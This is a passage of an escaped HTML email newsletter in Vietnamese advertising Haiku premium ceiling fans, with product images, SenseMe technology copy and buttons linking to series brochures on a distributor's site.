break-word;background-color: #017ed0;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #017ed0;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502368565-logo_baf.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 26%;max-width: 150.8px;\\\" width=\\\"150.8\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 16px; line-height: 22.4px;\\\"><strong><span style=\\\"font-family: Montserrat, sans-serif; line-height: 22.4px;\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1eeb Hoa K\\u1ef3.<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 26px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503530290-haiku-fans-residential-0.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\">Ki\\u1ec3u D\\u00e1ng Thi\\u1ebft K\\u1ebf Th\\u1ee7 C\\u00f4ng<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 35px; font-weight: 400;\\\">Tho\\u1ea3i M\\u00e1i S\\u00e1ng T\\u1ea1o<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503040555-stock-templates1677136007974-haiku-finishes.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h4 style=\\\"margin: 0px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 16px; font-weight: 400;\\\">MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG<\\/h4>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" style=\\\"height:37px; v-text-anchor:middle; width:143px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU H SERIES<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\" style=\\\"height:37px; v-text-anchor:middle; width:137px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU I SERIES<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#2dc26b\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #2dc26b; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU L SERIES<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#843fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #843fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU OUTDOOR<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\">Haiku \\u0111\\u00e3 gi\\u00e0nh \\u0111\\u01b0\\u1ee3c h\\u01a1n 75 gi\\u1ea3i th\\u01b0\\u1edfng c\\u00f4ng ngh\\u1ec7 v\\u00e0 thi\\u1ebft k\\u1ebf. Ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t theo ti\\u00eau chu\\u1ea9n ENERGY STAR\\u00ae, n\\u01a1i m\\u00e0 qu\\u1ea1t Haiku Fans \\u0111\\u00e3 chi\\u1ebfm t\\u1edbi 19 v\\u1ecb tr\\u00ed h\\u00e0ng \\u0111\\u1ea7u.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502718754-cambien_senseME.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\"><strong>C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\">B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p 